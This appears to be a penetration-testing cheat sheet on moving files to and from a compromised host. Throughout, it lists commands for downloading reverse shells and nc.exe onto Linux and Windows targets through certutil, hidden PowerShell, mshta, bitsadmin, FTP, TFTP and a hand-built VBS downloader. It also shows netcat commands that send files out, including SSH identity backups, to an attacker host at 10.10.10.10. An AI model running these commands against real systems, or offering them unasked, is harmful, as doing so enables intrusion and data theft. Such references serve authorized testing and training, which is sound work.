#
File Transfers
#
Web Download
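Oftentimes you will have to download a reverse shell or other file to the target; Python's built-in HTTP server works well as a temporary web server. It serves the whole current directory to anyone who can reach the port, so start it from a directory that holds only the files to transfer and stop it when done. On Local Box: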
python3 -m http.server 80 # Using python3
python -m SimpleHTTPServer 80 # Using python2 (deprecated)
On Remote (Linux):
wget 10.10.10.10/file
curl http://10.10.10.10/shell.sh -o /tmp/shell.sh
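On Remote (Windows) (each of these puts the full URL on the process command line, so they are visible wherever process-creation logging is enabled):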
certutil.exe -urlcache -f http://10.10.10.10/nc.exe %tmp%\nc.exe
powershell -w hidden -c "wget http://10.10.10.10/nc.exe -o nc.exe"
powershell -c "Invoke-WebRequest -Uri 'http://10.10.10.10:80/revshell.exe' -OutFile 'c:\windows\temp\revshell.exe'"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/nc.exe','C:\Users\public\nc.exe')"
mshta http://10.10.10.10/nc.exe
mshta ftp://10.10.10.10:21/nc.exe
C:\>bitsadmin /transfer nc http://10.10.10.10:80/nc.exe c:\users\public\nc.exe
#
ftp
On Local Box:
python3 -m pyftpdlib -p 21 -w # -w grants write access to the anonymous user; omit it when files are only being served
On Remote (Windows; the -s: option below belongs to the Windows ftp client):
# Create a file with needed ftp commands
echo open 10.10.10.10 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt
# Execute commands
ftp -v -n -s:ftp.txt
#
TFTP
On Local Box:
atftpd --daemon --port 69 /tftp
On Remote (Windows):
tftp -i 10.10.10.10 GET nc.exe
#
VBS wget
On Windows machines you may not have an easy way of downloading files, so you can write your own wget in VBS by echoing the script into a file line by line.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
# Execute
cscript wget.vbs http://10.10.10.10/file.exe file.exe
#
using evil-winrm
You can download and upload files from within an evil-winrm session:
download winpeas.txt
upload winPEAS.bat
#
Exfiltrate files
#
using nc
On remote host:
cat backup-ssh-identity-files.tgz | nc 10.10.10.10 443 # Linux
nc -vn 10.10.10.10 443 < winpeas.txt # Windows
Get-Content winpeas.txt | .\nc.exe -vn 10.10.14.22 443 # Older versions of powershell
On Windows you may need to download nc.exe first: certutil.exe -urlcache -f http://10.10.10.10/nc.exe c:\temp\nc.exe
On local host:
nc -lnvp 443 > linpeas.text
nc -lnvp 443 > backup-identity-files.tgz.b64
#
using evil-winrm
You can download and upload files from within an evil-winrm session:
download winpeas.txt
upload winPEAS.bat